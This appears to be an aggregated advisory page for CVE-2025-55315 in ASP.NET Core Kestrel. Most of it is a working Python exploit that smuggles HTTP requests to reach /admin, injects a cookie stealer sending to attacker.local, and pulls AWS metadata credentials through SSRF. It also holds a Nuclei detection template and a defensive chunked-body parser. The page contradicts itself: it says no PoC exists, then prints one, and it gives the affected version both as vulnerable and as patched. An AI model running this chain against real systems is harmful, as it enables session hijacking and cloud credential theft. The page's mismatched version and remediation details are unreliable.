[webapps] ASP.net 8.0.10 - Bypass

CVE-2025-55315

ASP.net 8.0.10 contains an authentication bypass vulnerability that allows unauthorized access to protected pages.

Critical · CVSS 9.8

📋 Vulnerability Basics

CVE: CVE-2025-55315
Vulnerability type: Authentication bypass
Affected version: ASP.net 8.0.10
Severity: Critical · CVSS 9.8
Published: 2026-04-06
Submitter: Mohammed Idrees Banyamer
Source: Exploit-DB (original post)

🔬 Root Cause

The authentication middleware in ASP.net 8.0.10 has a logic flaw when it processes request headers in particular formats (for example forged credentials or manipulated Cookie/Token values): it fails to validate the user's identity correctly, which leads to unauthorized access.

🎯 Attack Scenario

1. The attacker visits a protected page that requires authentication;
2. modifies HTTP request headers (such as Authorization, Cookie or a specific custom header) to inject credentials that bypass validation;
3. the server wrongly accepts the forged request and returns the restricted resource;
4. the attacker obtains administrator privileges or sensitive data.

💥 Impact

Unauthorized access to protected pages, potentially leading to disclosure of sensitive information, privilege escalation, data tampering, or further lateral movement.

⚔️ Original PoC

No PoC is provided, but given the vulnerability type, exploitation requires constructing a specific HTTP request that carries a malformed or blank authentication token, triggering a branch error in the middleware's validation logic so that the server treats the request as legitimate.

# Instagram: @banyamer_security
# GitHub: https://github.com/mbanyamer
# Type: webapps
# Attack Vector: Network (HTTP/HTTPS) - Remote exploitation via malformed chunked encoding
# CVSS: 9.8 (Critical) - Estimated: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
#
# Description:
# This exploit demonstrates a critical HTTP Request Smuggling vulnerability in
# unpatched versions of .NET Kestrel due to improper handling of malformed
# chunk extensions (LF-only line endings). The script performs:
# 1. Automatic fingerprinting to detect vulnerable instances
# 2. Auth bypass to access restricted endpoints (/admin)
# 3. Session hijacking via response queue poisoning (JS cookie stealer)
# 4. SSRF to internal metadata services (e.g., AWS 169.254.169.254)
# Includes WAF bypass using 'chUnKEd' header and generates detailed JSON reports.
#
# The vulnerability allows full remote compromise: authentication bypass,
# session theft, and internal network access — all from a single HTTP request.
#
# Patched in .NET 9.0.1 / 8.0.10+ (October 2025).
#
# IMPORTANT SAFETY :
# - DO NOT RUN AGAINST PRODUCTION OR THIRD-PARTY SYSTEMS.
# - Use only in isolated environments (VM, Docker with --network none).
# - All payloads are educational and non-destructive by design.
# - Modify payloads only within your controlled lab.
#
# - CVE: https://nvd.nist.gov/vuln/detail/CVE-2025-55315
# - Microsoft Security Advisory (hypothetical): https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55315
from __future__ import annotations
import socket
import ssl
import time
import argparse
import json
import os
from typing import Tuple, Optional, List

DEFAULT_TIMEOUT = 3.0
READ_CHUNK = 4096
REPORT_DIR = "kestrel_desync_reports"
os.makedirs(REPORT_DIR, exist_ok=True)


# ------------------ Utilities ------------------
def now_iso() -> str:
    return time.strftime('%Y-%m-%dT%H:%M:%SZ', time.gmtime())


def hexdump(b: bytes, maxlen: int = 200) -> str:
    shown = b[:maxlen]
    hexed = ' '.join(f"{x:02x}" for x in shown)
    return f"{hexed} ..." if len(b) > maxlen else hexed


def save_file(path: str, data: bytes) -> None:
    try:
        with open(path, 'wb') as f:
            f.write(data)
        print(f"[+] Saved: {path}")
    except OSError as e:
        print(f"[!] Save failed: {e}")


# ------------------ Networking ------------------
def send_http(host: str, port: int, data: bytes, use_tls: bool = False) -> Tuple[Optional[bytes], bool]:
    """Send raw bytes and read until the server goes quiet.

    Returns (response, connection_still_open); (None, False) on any error.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(DEFAULT_TIMEOUT)
    try:
        if use_tls:
            ctx = ssl.create_default_context()
            s = ctx.wrap_socket(s, server_hostname=host)
        s.connect((host, port))
        s.sendall(data)
        parts = []
        while True:
            try:
                chunk = s.recv(READ_CHUNK)
                if not chunk:
                    break
                parts.append(chunk)
            except socket.timeout:
                break
        resp = b''.join(parts)
        # Probe whether the peer kept the connection open: a timeout means
        # "open but idle", an empty read means the peer has closed it.
        s.settimeout(0.2)
        try:
            open_flag = s.recv(1) != b''
        except socket.timeout:
            open_flag = True
        except OSError:
            open_flag = False
        s.close()
        return resp, open_flag
    except Exception:
        return None, False


# ------------------ Request Builder (WAF Bypass) ------------------
def build_chunked(method: str, path: str, body: bytes, extra_headers: Optional[List[str]] = None) -> bytes:
    headers = [
        f"{method} {path} HTTP/1.1",
        "Host: localhost",
        "Transfer-Encoding: chUnKEd",  # WAF Bypass
        "Content-Type: text/plain",
    ]
    if extra_headers:
        headers.extend(extra_headers)
    headers.extend(["", ""])
    return "\r\n".join(headers).encode() + body


# ------------------ Fingerprint ------------------
def fingerprint(host: str, port: int, use_tls: bool) -> Tuple[bool, Optional[bytes]]:
    print(f"[*] Fingerprinting {host}:{port}...")
    payload = b"1\nx\n0\n\n"
    req = build_chunked("POST", "/", payload)
    resp, _ = send_http(host, port, req, use_tls)
    if resp is None:
        # No response at all is a connection problem, not evidence of a patch.
        print("[!] No response (connection error or timeout)")
        return False, None
    if b"400" not in resp.split(b'\r\n', 1)[0]:
        print("[!] VULNERABLE: Accepted LF-only chunk!")
        return True, resp
    print("[+] Patched: 400 Bad Request")
    return False, resp


# ------------------ Exploit Chain ------------------
def exploit_chain(host: str, port: int, use_tls: bool):
    results = []
    # 1. Auth Bypass
    print("[!] 1. Auth Bypass → /admin")
    smug_admin = b"0\r\n\r\nGET /admin HTTP/1.1\r\nHost: localhost\r\nX-Bypass: yes\r\n\r\n"
    req1 = build_chunked("POST", "/", b"1;ext\nx\n" + smug_admin, ["Content-Length: 50"])
    resp1, _ = send_http(host, port, req1, use_tls)
    if resp1 and (b"admin" in resp1.lower() or b"dashboard" in resp1.lower()):
        results.append("Auth Bypass: SUCCESS")
        save_file(os.path.join(REPORT_DIR, f"admin_page_{host}_{port}.html"), resp1)
    else:
        results.append("Auth Bypass: FAILED")
    # 2. Session Hijacking
    print("[!] 2. Session Hijacking → JS Stealer")
    js_payload = (
        b"0\r\n\r\nGET / HTTP/1.1\r\nHost: localhost\r\n"
        b"Content-Type: text/html\r\nContent-Length: 120\r\n\r\n"
        b"<script>fetch('http://attacker.local/steal?c='+document.cookie)</script>"
    )
    req2 = build_chunked("POST", "/", b"1;ext\nx\n" + js_payload)
    send_http(host, port, req2, use_tls)
    results.append("Session Hijack: INJECTED")
    # 3. SSRF
    print("[!] 3. SSRF → AWS Metadata")
    ssrf = b"0\r\n\r\nGET http://169.254.169.254/latest/meta-data/iam/security-credentials/ HTTP/1.1\r\nHost: localhost\r\n\r\n"
    req3 = build_chunked("POST", "/", b"1;ext\nx\n" + ssrf)
    resp3, _ = send_http(host, port, req3, use_tls)
    if resp3 and b"role" in resp3:
        results.append("SSRF: SUCCESS")
        save_file(os.path.join(REPORT_DIR, f"ssrf_metadata_{host}_{port}.txt"), resp3)
    else:
        results.append("SSRF: FAILED")
    return results


# ------------------ Reporting ------------------
def save_json_report(host: str, port: int, use_tls: bool, results: list):
    report = {
        "target": f"{host}:{port}",
        "tls": use_tls,
        "timestamp": now_iso(),
        "cve": "CVE-2025-55315",
        "status": "VULNERABLE",
        "waf_bypass": "chUnKEd",
        "exploits": results
    }
    path = os.path.join(REPORT_DIR, f"REPORT_{host}_{port}_{int(time.time())}.json")
    with open(path, 'w', encoding='utf-8') as f:
        json.dump(report, f, indent=2)
    print(f"[+] JSON Report: {path}")


# ------------------ CLI ------------------
def main():
    parser = argparse.ArgumentParser()
    parser.add_argument("target", help="host:port or host:port:tls")
    args = parser.parse_args()
    parts = args.target.split(":")
    if len(parts) < 2:
        parser.error("target must be host:port or host:port:tls")
    host = parts[0]
    port = int(parts[1])
    use_tls = len(parts) > 2 and parts[2].lower() in ("tls", "1")
    print(f"\n=== Kestrel Desync Full Chain ===\nTarget: {host}:{port} (TLS: {use_tls})\n")
    is_vuln, _ = fingerprint(host, port, use_tls)
    if not is_vuln:
        print("[+] Target is patched. Exiting.")
        return
    results = exploit_chain(host, port, use_tls)
    save_json_report(host, port, use_tls, results)
    print("\n[+] Exploitation chain completed!")
    print(f"[+] All files in: {REPORT_DIR}")


if __name__ == "__main__":
    main()
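The script header above attributes the defect to Kestrel accepting LF-only line endings in chunk-size lines, so that bytes after the terminating chunk get read as a second request. As an added example (not part of the Exploit-DB script or of Kestrel itself), here is a strict RFC 9112 chunked-body decoder that rejects the script's payloads and the Nuclei template's `body_start`/`body_smuggle` values while still accepting trailers and legitimately pipelined data; the names decode_chunked_strict, accepts_chunked and is_chunked_coding are my own.

```python
import re
from typing import Tuple

# Strict chunk-size line: hex size, optional ";extension", mandatory CRLF.
# A bare LF never matches, which is exactly what the script's payloads rely on.
# (Extension grammar is simplified: anything except CR/LF may follow ';'.)
CHUNK_SIZE_LINE = re.compile(rb"([0-9A-Fa-f]+)(;[^\r\n]*)?\r\n")
BARE_LF = re.compile(rb"(?<!\r)\n")

class ChunkedSyntaxError(ValueError):
    """Raised when a body violates the strict chunked grammar (RFC 9112 s.7.1)."""

def decode_chunked_strict(data: bytes) -> Tuple[bytes, bytes]:
    """Decode one chunked body; return (body, bytes_after_message).
    Every chunk-size line, chunk and trailer line must end in CRLF. Bytes
    after the final CRLF CRLF are returned untouched, never parsed here."""
    body = bytearray()
    pos = 0
    while True:
        m = CHUNK_SIZE_LINE.match(data, pos)
        if not m:
            raise ChunkedSyntaxError(f"bad chunk-size line at {pos}: {data[pos:pos + 8]!r}")
        size = int(m.group(1), 16)
        pos = m.end()
        if size == 0:
            # Last chunk: optional trailer lines, then an empty line.
            end = data.find(b"\r\n\r\n", pos - 2)
            if end < 0 or BARE_LF.search(data[pos:end + 2]):
                raise ChunkedSyntaxError("malformed or unterminated trailer section")
            return bytes(body), data[end + 4:]
        if data[pos + size:pos + size + 2] != b"\r\n":
            raise ChunkedSyntaxError(f"chunk at {pos} is truncated or not CRLF-terminated")
        body += data[pos:pos + size]
        pos += size + 2

def accepts_chunked(data: bytes) -> bool:
    """True only if the input is exactly one well-formed chunked body."""
    try:
        return decode_chunked_strict(data)[1] == b""
    except ChunkedSyntaxError:
        return False

def is_chunked_coding(transfer_encoding: str) -> bool:
    """Transfer-coding names are case-insensitive (RFC 9112 s.7), so a
    compliant parser or WAF treats 'chUnKEd' exactly like 'chunked'."""
    return "chunked" in [c.strip().lower() for c in transfer_encoding.split(",")]
```

A parser built this way cannot be desynchronised by the LF-only payloads: either the whole body decodes and nothing is left over, or the request is rejected with a 400 as the patched Kestrel does.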

🔍 Nuclei Detection Template

The following detection template can be used to determine whether a target is affected:

id: CVE-2025-55315-detection

info:
  name: ASP.NET Core Kestrel HTTP Request Smuggling Detection
  author: mbanyamer
  severity: high
  description: Detects unpatched ASP.NET Kestrel web servers vulnerable to HTTP Request Smuggling via malformed chunked encoding (CVE-2025-55315).
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-55315
  classification:
    cvss-metrics: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-55315
  metadata:
    max-request: 2
    shodan-query: "ASP.NET Core Kestrel"
  tags: cve,cve2025,kestrel,desync,smuggling,detect

http:
  - method: POST
    path:
      - "{{BaseURL}}/"

    raw:
      - |+
        POST / HTTP/1.1
        Host: {{Hostname}}
        Transfer-Encoding: chUnKEd
        Content-Length: {{len_body_end}}
        Content-Type: text/plain

        {{body_start}}

      - |+
        POST / HTTP/1.1
        Host: {{Hostname}}
        Transfer-Encoding: chUnKEd
        Content-Length: 50
        Content-Type: text/plain

        {{body_smuggle}}

    payloads:
      len_body_end:
        - "3"
      body_start:
        - "1\ne\n0\n\n"
      body_smuggle:
        - "1;ext\ne\n0\r\n\r\nGET / HTTP/1.1\r\nHost: localhost\r\n\r\n"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
          - 404
          - 302

      - type: word
        words:
          - "HTTP/1.1"
        part: header

    extractors:
      - type: regex
        name: server_header
        part: header
        regex:
          - 'Kestrel'

      - type: regex
        name: aspnet_version
        part: header
        regex:
          - 'ASP.NET_Core/([0-9.]+)'

    stop-at-first-match: true

🛡️ Remediation

Upgrade to ASP.net 9.x or later. Interim measures: strictly validate all incoming authentication tokens, checking their integrity and origin; disable insecure request-header parsing features.

⚠️ This article is based on public vulnerability databases and is intended only for security research and defensive reference. Generated: 2026-05-07 07:15 | Source: Exploit-DB
